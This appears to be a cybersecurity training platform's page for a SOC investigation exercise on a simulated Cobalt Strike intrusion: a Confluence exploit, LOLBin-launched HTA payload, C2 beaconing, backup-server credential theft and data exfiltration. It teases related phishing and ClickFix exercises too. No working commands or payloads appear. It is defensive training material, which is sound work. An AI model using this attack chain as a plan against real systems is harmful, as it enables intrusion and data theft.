
Cobalt Strike: Beacon Detection
In this scenario, a sophisticated threat actor has gained a foothold in a corporate environment. You will serve as a SOC Analyst tasked with identifying the initial infection vector, tracing lateral movement, and uncovering the final objectives of the intrusion. This room focuses on detecting Cobalt Strike malleable C2 profiles, process injection patterns, and the deployment of LockBit ransomware. You will utilize SIEM logs and XDR telemetry to reconstruct the attack timeline and identify critical Indicators of Compromise (IOCs).
Start this operation
Requires a Pro subscription.
View Pro PlansFree forever — no credit card required
Investigation Tasks
Complete each task by investigating alerts and submitting your findings.
Find the LOLBin That Launched the Intrusion
10CORP-WEB-01 runs a public-facing Confluence server, and an exploitation attempt against it (CVE-2023-22527) gave the attacker code execution as SYSTEM. The first stage abused a signed, built-in Windows utility to pull down and run a remote HTA payload. Trace the process chain under the Confluence web process and identify the legitimate Microsoft binary the attacker repurposed for that initial execution.
Pin Down the Command-and-Control Destination
10Moments after the HTA payload ran, the compromised CORP-WEB-01 host reached out to attacker-controlled infrastructure to establish its beacon. Having confirmed how the host was initially executed, your next step is to scope the C2 channel. Review the XDR Network Events for the outbound connection that left the host right after that first-stage execution and identify the external destination it called home to.
Fingerprint the In-Memory PowerShell Stage
5With the C2 channel mapped, you need to characterise what the beacon actually ran. On CORP-WEB-01 the LOLBin you identified spawned a hidden PowerShell process that carried the next stage of the intrusion. To support detection-engineering and threat-intel enrichment, pivot into the XDR Process Tree, locate that PowerShell node in the chain, and record the file hash the EDR captured for it.
Catch the Tooling Dropped to Disk
5The in-memory stage gave the attacker hands-on access, and they began pulling additional tooling onto CORP-WEB-01. During one session the host made an outbound HTTP request to a suspicious external server, and shortly afterward an unrecognised binary appeared in a temporary directory. Work the SIEM event messages for that session and identify the name of the file that was written to the host.
Hash the Executed Payload
5One of the binaries the attacker staged on CORP-WEB-01 was run from the Administrator's Temp directory through cmd.exe. The same payload name shows up more than once in the logs, so you will need to isolate the specific execution that matters before you enrich it. Review the SIEM process-creation logs, pin down that execution event, and record the file hash captured for the payload.
Trace Credential Harvesting on the Backup Server
5After establishing their foothold, the adversary moved toward the backup infrastructure on corp-bkp-01, using a service account to hunt for administrative credentials. Backup servers are a prized target because they hold keys to the wider estate. Examine the XDR timeline for the PowerShell activity tied to that service account and identify the script that was run to extract credentials from the backup software.
Identify the Exfiltration Tool
5With credentials in hand, the attacker turned to moving data out of the estate and staged a third-party transfer utility to copy a sensitive file share to cloud storage. Before you can block and hunt for this tool, you need a reliable identifier for it. Work through the XDR Process Tree, locate the process responsible for the bulk copy, and record the file hash captured for that binary.
Scope Where the Stolen Data Went
5You have identified the transfer utility the attacker used; the final step is to determine where the data actually went so the destination can be blocked and reported. That tool, running on CORP-FILE-01, pushed a large volume of data out of the environment in a single transfer. Review the XDR Network Events for the outbound connection it opened and identify the external destination that received the unauthorised upload.
8 tasks · 50 points total
Start investigationTraining Tools
Skills You'll Build
Requires foundational alert triage skills. Multiple data sources to correlate.
Prerequisites
- Basic understanding of security alerts
- Familiarity with SIEM concepts
- Familiarity with XDR concepts
Ready to investigate?
This operation requires a Pro subscription.
View Pro PlansFree forever — no credit card required
More Operations
View allCredential Harvesting: The Lookalike Login
Investigate an adversary-in-the-middle (AiTM) credential phishing campaign that lured an employee to a lookalike Microsoft 365 login page. Working entirely from SIEM logs, you will identify the lookalike domain, reconstruct the multi-hop redirect chain through a compromised legitimate site, uncover a secondary phishing wave against another employee, and confirm account takeover in Azure AD sign-in logs via impossible travel and session-token replay. You finish by choosing the containment action that actually evicts an attacker holding a valid session token. Foundational skills for SOC analysts in lookalike-domain analysis and identity-centric incident response.
QR Code Phishing: Scan to Compromise
In this scenario, you will investigate a modern 'Quishing' (QR phishing) attack that bypassed traditional email filters by hiding its payload inside an image. You will trace the full chain: a spoofed MFA-enrollment lure sent from purpose-built infrastructure, a redirect server that conceals the final destination, and an Evilginx-style adversary-in-the-middle page that stole an authenticated session cookie despite MFA. You will then follow the attacker's post-compromise moves — Graph API mailbox enumeration, SharePoint exfiltration, and a hidden inbox forwarding rule — and choose the containment action that actually evicts them.
ClickFix: The Fake CAPTCHA Trap
The ClickFix social engineering technique uses dialogue boxes containing fake error messages to trick victims into copying, pasting, and running malicious content. In this scenario, a user was targeted with a 'Verify You Are Human' CAPTCHA check that led to a significant endpoint compromise. You will analyze the 'paste-and-run' execution chain, investigate PowerShell activity initiated via the Windows Run dialog, and identify the deployment of an information stealer.